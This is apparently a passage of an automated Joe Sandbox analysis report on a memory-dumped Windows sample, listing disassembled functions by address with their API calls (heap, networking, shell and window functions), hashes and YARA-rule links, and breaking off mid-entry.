                                                                                                                                                                  • Source File: 00000007.00000002.2961568682.00000000001E1000.00000040.00000001.01000000.00000008.sdmp, Offset: 001E0000, based on PE: true
                                                                                                                                                                  • Associated: 00000007.00000002.2961490557.00000000001E0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.000000000028E000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.000000000029A000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.00000000002B4000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.000000000033D000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2962357717.0000000000343000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2962471627.0000000000344000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_7_2_1e0000_UNK_.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID:
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID:
                                                                                                                                                                  • Opcode ID: e21139d5fe7211f9e84b8b2fb2d762dce10dd71740c76e6eabe0959672195f1c
                                                                                                                                                                  • Instruction ID: 8cd91e99897355693bee2bc596b4715fde6e32a5a27c6b86c32ee9c233874ff5
                                                                                                                                                                  • Opcode Fuzzy Hash: e21139d5fe7211f9e84b8b2fb2d762dce10dd71740c76e6eabe0959672195f1c
                                                                                                                                                                  • Instruction Fuzzy Hash: F3C18D75A2121AEFDB14CF94C984EAEB7B5FF58304F104598E801EB291D770EE91CBA1
                                                                                                                                                                  Function 001E131C Relevance: 6.2, APIs: 3, Strings: 1, Instructions: 159COMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  APIs
                                                                                                                                                                    • Part of subcall function 001E16F2: RegisterClipboardFormatW.USER32(WM_GETCONTROLNAME), ref: 001E1751
                                                                                                                                                                  • GetStdHandle.KERNEL32(000000F6,00000000,00000000), ref: 001E159B
                                                                                                                                                                  • CoInitialize.OLE32(00000000), ref: 001E1612
                                                                                                                                                                  • CloseHandle.KERNEL32(00000000), ref: 002558F7
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000007.00000002.2961568682.00000000001E1000.00000040.00000001.01000000.00000008.sdmp, Offset: 001E0000, based on PE: true
                                                                                                                                                                  • Associated: 00000007.00000002.2961490557.00000000001E0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.000000000028E000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.000000000029A000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.00000000002B4000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.000000000033D000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2962357717.0000000000343000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2962471627.0000000000344000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_7_2_1e0000_UNK_.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: Handle$ClipboardCloseFormatInitializeRegister
                                                                                                                                                                  • String ID: '/"
                                                                                                                                                                  • API String ID: 458326420-88076542
                                                                                                                                                                  • Opcode ID: 9a2ff17e62497ce31db32c1e529096945d221067b5aab664feee9ad914e46ad7
                                                                                                                                                                  • Instruction ID: 69c6c413623144e408cee701a8c7972cc5bfa46ce88f6efdfdce061bcef69e60
                                                                                                                                                                  • Opcode Fuzzy Hash: 9a2ff17e62497ce31db32c1e529096945d221067b5aab664feee9ad914e46ad7
                                                                                                                                                                  • Instruction Fuzzy Hash: 5971B9B89143918BC714DF6EB999498BBA8FB5F3B4F84816ED01A87262DF704834CF11
                                                                                                                                                                  Function 0022CC82 Relevance: 6.2, APIs: 4, Instructions: 154COMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  APIs
                                                                                                                                                                    • Part of subcall function 001E41A7: _fseek.LIBCMT ref: 001E41BF
                                                                                                                                                                    • Part of subcall function 0022CE59: _wcscmp.LIBCMT ref: 0022CF49
                                                                                                                                                                    • Part of subcall function 0022CE59: _wcscmp.LIBCMT ref: 0022CF5C
                                                                                                                                                                  • _free.LIBCMT ref: 0022CDC9
                                                                                                                                                                  • _free.LIBCMT ref: 0022CDD0
                                                                                                                                                                  • _free.LIBCMT ref: 0022CE3B
                                                                                                                                                                    • Part of subcall function 002028CA: RtlFreeHeap.NTDLL(00000000,00000000,?,00208715,00000000,002088A3,00204673,?), ref: 002028DE
                                                                                                                                                                    • Part of subcall function 002028CA: GetLastError.KERNEL32(00000000,?,00208715,00000000,002088A3,00204673,?), ref: 002028F0
                                                                                                                                                                  • _free.LIBCMT ref: 0022CE43
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000007.00000002.2961568682.00000000001E1000.00000040.00000001.01000000.00000008.sdmp, Offset: 001E0000, based on PE: true
                                                                                                                                                                  • Associated: 00000007.00000002.2961490557.00000000001E0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.000000000028E000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.000000000029A000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.00000000002B4000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.000000000033D000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2962357717.0000000000343000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2962471627.0000000000344000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_7_2_1e0000_UNK_.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: _free$_wcscmp$ErrorFreeHeapLast_fseek
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 1552873950-0
                                                                                                                                                                  • Opcode ID: 3bbf84d6b84c5ccb4406d7a14d13c4f849fbec825050499589f31b9b6ee91132
                                                                                                                                                                  • Instruction ID: ce03884f05fce6518b18208aebcc27f07573b80b3a62c07b6146673a01264ee0
                                                                                                                                                                  • Opcode Fuzzy Hash: 3bbf84d6b84c5ccb4406d7a14d13c4f849fbec825050499589f31b9b6ee91132
                                                                                                                                                                  • Instruction Fuzzy Hash: 0D5150B1914218AFDF14DFA4DC81AAEB7B9EF08300F1040AEF619A3281D7715A90CF29
                                                                                                                                                                  Function 001E1E58 Relevance: 6.1, APIs: 4, Instructions: 65timewindowCOMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  APIs
                                                                                                                                                                  • _memset.LIBCMT ref: 001E1E87
                                                                                                                                                                    • Part of subcall function 001E38E4: _memset.LIBCMT ref: 001E3965
                                                                                                                                                                    • Part of subcall function 001E38E4: _wcscpy.LIBCMT ref: 001E39B5
                                                                                                                                                                    • Part of subcall function 001E38E4: Shell_NotifyIconW.SHELL32(00000001,?), ref: 001E39C6
                                                                                                                                                                  • KillTimer.USER32(?,00000001), ref: 001E1EDC
                                                                                                                                                                  • SetTimer.USER32(?,00000001,000002EE,00000000), ref: 001E1EEB
                                                                                                                                                                  • Shell_NotifyIconW.SHELL32(00000001,000003A8), ref: 00254526
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000007.00000002.2961568682.00000000001E1000.00000040.00000001.01000000.00000008.sdmp, Offset: 001E0000, based on PE: true
                                                                                                                                                                  • Associated: 00000007.00000002.2961490557.00000000001E0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.000000000028E000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.000000000029A000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.00000000002B4000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.000000000033D000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2962357717.0000000000343000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2962471627.0000000000344000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_7_2_1e0000_UNK_.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: IconNotifyShell_Timer_memset$Kill_wcscpy
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 1378193009-0
                                                                                                                                                                  • Opcode ID: 79f4807710da1e373d9f06ed1a1f341702d2682edc42d81985cc109da8f8fc4f
                                                                                                                                                                  • Instruction ID: 233b50f92e2de6ffcc2137dd47081432df9ad7325d82b6a09d8512a149cf5e4f
                                                                                                                                                                  • Opcode Fuzzy Hash: 79f4807710da1e373d9f06ed1a1f341702d2682edc42d81985cc109da8f8fc4f
                                                                                                                                                                  • Instruction Fuzzy Hash: 6621F5719047C4ABE7339B259859BEBFBEC9B15308F04008DFA9E56141D7B06AC8CB51
                                                                                                                                                                  Function 002392C0 Relevance: 6.1, APIs: 4, Instructions: 60networkCOMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  APIs
                                                                                                                                                                    • Part of subcall function 001FF26B: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,?,0022AEA5,?,?,00000000,00000008), ref: 001FF282
                                                                                                                                                                    • Part of subcall function 001FF26B: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,?,00000000,00000000,00000000,00000000,?,?,0022AEA5,?,?,00000000,00000008), ref: 001FF2A6
                                                                                                                                                                  • gethostbyname.WS2_32(?), ref: 002392F0
                                                                                                                                                                  • WSAGetLastError.WS2_32(00000000), ref: 002392FB
                                                                                                                                                                  • _memmove.LIBCMT ref: 00239328
                                                                                                                                                                  • inet_ntoa.WS2_32(?), ref: 00239333
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000007.00000002.2961568682.00000000001E1000.00000040.00000001.01000000.00000008.sdmp, Offset: 001E0000, based on PE: true
                                                                                                                                                                  • Associated: 00000007.00000002.2961490557.00000000001E0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.000000000028E000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.000000000029A000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.00000000002B4000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.000000000033D000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2962357717.0000000000343000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2962471627.0000000000344000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_7_2_1e0000_UNK_.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: ByteCharMultiWide$ErrorLast_memmovegethostbynameinet_ntoa
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 1504782959-0
                                                                                                                                                                  • Opcode ID: 1b98d8491cd2010092bb710a2c60519fcdd0b225a06376134d6ff98e2945a959
                                                                                                                                                                  • Instruction ID: e8dabb3bd09ab6b6dc1f81abc58f51e80bb1ef5632c2edc498c6fa2968c5ca20
                                                                                                                                                                  • Opcode Fuzzy Hash: 1b98d8491cd2010092bb710a2c60519fcdd0b225a06376134d6ff98e2945a959
                                                                                                                                                                  • Instruction Fuzzy Hash: 91118276A00509AFCB04FFA1DD5ACEEB7B9EF18314B104065F506A72A1DB70EE15CB51
                                                                                                                                                                  Function 0020010A Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 43COMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  APIs
                                                                                                                                                                    • Part of subcall function 002045EC: __FF_MSGBANNER.LIBCMT ref: 00204603
                                                                                                                                                                    • Part of subcall function 002045EC: __NMSG_WRITE.LIBCMT ref: 0020460A
                                                                                                                                                                    • Part of subcall function 002045EC: RtlAllocateHeap.NTDLL(00D80000,00000000,00000001), ref: 0020462F
                                                                                                                                                                  • std::exception::exception.LIBCMT ref: 0020013E
                                                                                                                                                                  • __CxxThrowException@8.LIBCMT ref: 00200153
                                                                                                                                                                    • Part of subcall function 00207495: RaiseException.KERNEL32(?,?,001E125D,00296598,?,?,?,00200158,001E125D,00296598,?,00000001), ref: 002074E6
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000007.00000002.2961568682.00000000001E1000.00000040.00000001.01000000.00000008.sdmp, Offset: 001E0000, based on PE: true
                                                                                                                                                                  • Associated: 00000007.00000002.2961490557.00000000001E0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.000000000028E000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.000000000029A000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.00000000002B4000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.000000000033D000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2962357717.0000000000343000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2962471627.0000000000344000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_7_2_1e0000_UNK_.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: AllocateExceptionException@8HeapRaiseThrowstd::exception::exception
                                                                                                                                                                  • String ID: bad allocation
                                                                                                                                                                  • API String ID: 3902256705-2104205924
                                                                                                                                                                  • Opcode ID: 6c73c4d439239639e5726456147f98a4224b6ed53b8d13287a8706aca6492225
                                                                                                                                                                  • Instruction ID: 9cf0f43d91d30511cc07de7aacabc266160a1d9df16eb86ce277ddd9d2186c0c
                                                                                                                                                                  • Opcode Fuzzy Hash: 6c73c4d439239639e5726456147f98a4224b6ed53b8d13287a8706aca6492225
                                                                                                                                                                  • Instruction Fuzzy Hash: 80F02D3553830E66D715BFE8DC42ADEB7EC9F04340F100015F908950C3CBB09AB09AA0
                                                                                                                                                                  Function 001EC610 Relevance: 4.6, APIs: 3, Instructions: 125COMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  APIs
                                                                                                                                                                  • MultiByteToWideChar.KERNEL32(00000000,00000001,?,?,00000000,00000000,?,?,?,001EC00E,?,?,?,?,00000010), ref: 001EC627
                                                                                                                                                                  • MultiByteToWideChar.KERNEL32(00000000,00000001,?,?,00000000,?,?,?,00000010), ref: 001EC65F
                                                                                                                                                                  • _memmove.LIBCMT ref: 001EC697
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000007.00000002.2961568682.00000000001E1000.00000040.00000001.01000000.00000008.sdmp, Offset: 001E0000, based on PE: true
                                                                                                                                                                  • Associated: 00000007.00000002.2961490557.00000000001E0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.000000000028E000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.000000000029A000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.00000000002B4000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.000000000033D000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2962357717.0000000000343000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2962471627.0000000000344000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_7_2_1e0000_UNK_.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: ByteCharMultiWide$_memmove
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 3033907384-0
                                                                                                                                                                  • Opcode ID: 017d94754f6202ebe6a536e988e74cfd66eff1a36be1e2b69effb8ffc27efc53
                                                                                                                                                                  • Instruction ID: b1e31f84ddb142ceb41f8382d5d5994d4c3da10cb40650f05b7e747f0246d462
                                                                                                                                                                  • Opcode Fuzzy Hash: 017d94754f6202ebe6a536e988e74cfd66eff1a36be1e2b69effb8ffc27efc53
                                                                                                                                                                  • Instruction Fuzzy Hash: 3D31F7B2600701ABD7249F35DC46B2BB7D9EF48310F10452EF95E8B2D1EB72E9518B91
                                                                                                                                                                  Function 001E3A67 Relevance: 4.6, APIs: 3, Instructions: 78COMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  APIs
                                                                                                                                                                  • SHGetMalloc.SHELL32(001E3C31), ref: 001E3A7D
                                                                                                                                                                  • SHGetPathFromIDListW.SHELL32(?,?), ref: 001E3AD2
                                                                                                                                                                  • SHGetDesktopFolder.SHELL32(?), ref: 001E3A8F
                                                                                                                                                                    • Part of subcall function 001E3B1E: _wcsncpy.LIBCMT ref: 001E3B32
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000007.00000002.2961568682.00000000001E1000.00000040.00000001.01000000.00000008.sdmp, Offset: 001E0000, based on PE: true
                                                                                                                                                                  • Associated: 00000007.00000002.2961490557.00000000001E0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.000000000028E000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.000000000029A000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.00000000002B4000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.000000000033D000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2962357717.0000000000343000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2962471627.0000000000344000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_7_2_1e0000_UNK_.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: DesktopFolderFromListMallocPath_wcsncpy
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 3981382179-0
                                                                                                                                                                  • Opcode ID: d35ed9e2b79010b3a3f28d0b0e7c5b11792e7a53014b75c2426b81c2e988c6d1
                                                                                                                                                                  • Instruction ID: 9048e8c8094573e920fb3ae2add16955c5c8b0e76d334ab761bb314810adfa26
                                                                                                                                                                  • Opcode Fuzzy Hash: d35ed9e2b79010b3a3f28d0b0e7c5b11792e7a53014b75c2426b81c2e988c6d1
                                                                                                                                                                  • Instruction Fuzzy Hash: 13216276B00518ABCB14DF96DC88DEEB7BDEF88740B1040A4F51ADB251DB709E46CB94
                                                                                                                                                                  Function 002045EC Relevance: 4.6, APIs: 3, Instructions: 59memoryCOMMONLIBRARYCODE
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  APIs
                                                                                                                                                                  • __FF_MSGBANNER.LIBCMT ref: 00204603
                                                                                                                                                                    • Part of subcall function 00208E52: __NMSG_WRITE.LIBCMT ref: 00208E79
                                                                                                                                                                    • Part of subcall function 00208E52: __NMSG_WRITE.LIBCMT ref: 00208E83
                                                                                                                                                                  • __NMSG_WRITE.LIBCMT ref: 0020460A
                                                                                                                                                                    • Part of subcall function 00208EB2: GetModuleFileNameW.KERNEL32(00000000,002A0312,00000104,?,00000001,00200127), ref: 00208F44
                                                                                                                                                                    • Part of subcall function 00208EB2: ___crtMessageBoxW.LIBCMT ref: 00208FF2
                                                                                                                                                                    • Part of subcall function 00201D65: ___crtCorExitProcess.LIBCMT ref: 00201D6B
                                                                                                                                                                    • Part of subcall function 00201D65: ExitProcess.KERNEL32 ref: 00201D74
                                                                                                                                                                    • Part of subcall function 0020889E: __getptd_noexit.LIBCMT ref: 0020889E
                                                                                                                                                                  • RtlAllocateHeap.NTDLL(00D80000,00000000,00000001), ref: 0020462F
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000007.00000002.2961568682.00000000001E1000.00000040.00000001.01000000.00000008.sdmp, Offset: 001E0000, based on PE: true
                                                                                                                                                                  • Associated: 00000007.00000002.2961490557.00000000001E0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.000000000028E000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.000000000029A000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.00000000002B4000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.000000000033D000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2962357717.0000000000343000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2962471627.0000000000344000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_7_2_1e0000_UNK_.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: ExitProcess___crt$AllocateFileHeapMessageModuleName__getptd_noexit
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 1372826849-0
                                                                                                                                                                  • Opcode ID: 9fbdf8b12cb21e401423480e4914ff6b27a5cf1cbeb5db61a1575e1aedc0565a
                                                                                                                                                                  • Instruction ID: 5fe776c3c50cdd702a690553800839d6e9fe930a2ac8b20d969606fd812c14e2
                                                                                                                                                                  • Opcode Fuzzy Hash: 9fbdf8b12cb21e401423480e4914ff6b27a5cf1cbeb5db61a1575e1aedc0565a
                                                                                                                                                                  • Instruction Fuzzy Hash: 750196716317129AE7207F24AC45A2B275CAB83B61F11812AFB45971C3EFB19C608A65
                                                                                                                                                                  Function 001EE60E Relevance: 4.5, APIs: 3, Instructions: 31windowCOMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  APIs
                                                                                                                                                                  • TranslateMessage.USER32(?), ref: 001EE646
                                                                                                                                                                  • DispatchMessageW.USER32(?), ref: 001EE651
                                                                                                                                                                  • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 001EE664
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000007.00000002.2961568682.00000000001E1000.00000040.00000001.01000000.00000008.sdmp, Offset: 001E0000, based on PE: true
                                                                                                                                                                  • Associated: 00000007.00000002.2961490557.00000000001E0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.000000000028E000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.000000000029A000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.00000000002B4000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.000000000033D000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2962357717.0000000000343000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2962471627.0000000000344000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_7_2_1e0000_UNK_.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: Message$DispatchPeekTranslate
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 4217535847-0
                                                                                                                                                                  • Opcode ID: 16490fcf8514e0199ce762b89b2aec7071e5aa9112370a5457dd289ff7e91a9a
                                                                                                                                                                  • Instruction ID: 959b407597582a86caea9bf3e508f8a74bbf2516d754bf18372abfda3aea8dbf
                                                                                                                                                                  • Opcode Fuzzy Hash: 16490fcf8514e0199ce762b89b2aec7071e5aa9112370a5457dd289ff7e91a9a
                                                                                                                                                                  • Instruction Fuzzy Hash: CDF01C7264438A9BEB10DAE19C49B6BB3DDBF98740F044C2DF645C6090EBF4D4088722
                                                                                                                                                                  Function 0022C450 Relevance: 4.5, APIs: 3, Instructions: 22COMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  APIs
                                                                                                                                                                  • _free.LIBCMT ref: 0022C45E
                                                                                                                                                                    • Part of subcall function 002028CA: RtlFreeHeap.NTDLL(00000000,00000000,?,00208715,00000000,002088A3,00204673,?), ref: 002028DE
                                                                                                                                                                    • Part of subcall function 002028CA: GetLastError.KERNEL32(00000000,?,00208715,00000000,002088A3,00204673,?), ref: 002028F0
                                                                                                                                                                  • _free.LIBCMT ref: 0022C46F
                                                                                                                                                                  • _free.LIBCMT ref: 0022C481
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000007.00000002.2961568682.00000000001E1000.00000040.00000001.01000000.00000008.sdmp, Offset: 001E0000, based on PE: true
                                                                                                                                                                  • Associated: 00000007.00000002.2961490557.00000000001E0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.000000000028E000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.000000000029A000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.00000000002B4000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.000000000033D000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2962357717.0000000000343000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2962471627.0000000000344000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_7_2_1e0000_UNK_.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: _free$ErrorFreeHeapLast
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 776569668-0
                                                                                                                                                                  • Opcode ID: 087bea45b9e552155f1be1c866ba964bb642fabb90d708dc02c9b9c981af8e32
                                                                                                                                                                  • Instruction ID: 8dd306dbebed1ae34bdceb7c0753c19a2aa922edebb958b429a4fb6faa0496ce
                                                                                                                                                                  • Opcode Fuzzy Hash: 087bea45b9e552155f1be1c866ba964bb642fabb90d708dc02c9b9c981af8e32
                                                                                                                                                                  • Instruction Fuzzy Hash: 41E08CA1221712E2CA28BDB86848BA713CC2B04310B34982EB449D3183CF24E864C434
                                                                                                                                                                  Function 001F058E Relevance: 4.0, APIs: 1, Strings: 1, Instructions: 527COMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000007.00000002.2961568682.00000000001E1000.00000040.00000001.01000000.00000008.sdmp, Offset: 001E0000, based on PE: true
                                                                                                                                                                  • Associated: 00000007.00000002.2961490557.00000000001E0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.000000000028E000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.000000000029A000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.00000000002B4000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.000000000033D000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2962357717.0000000000343000.00000080.00000001.01000000.00000008.sdmpDownload File
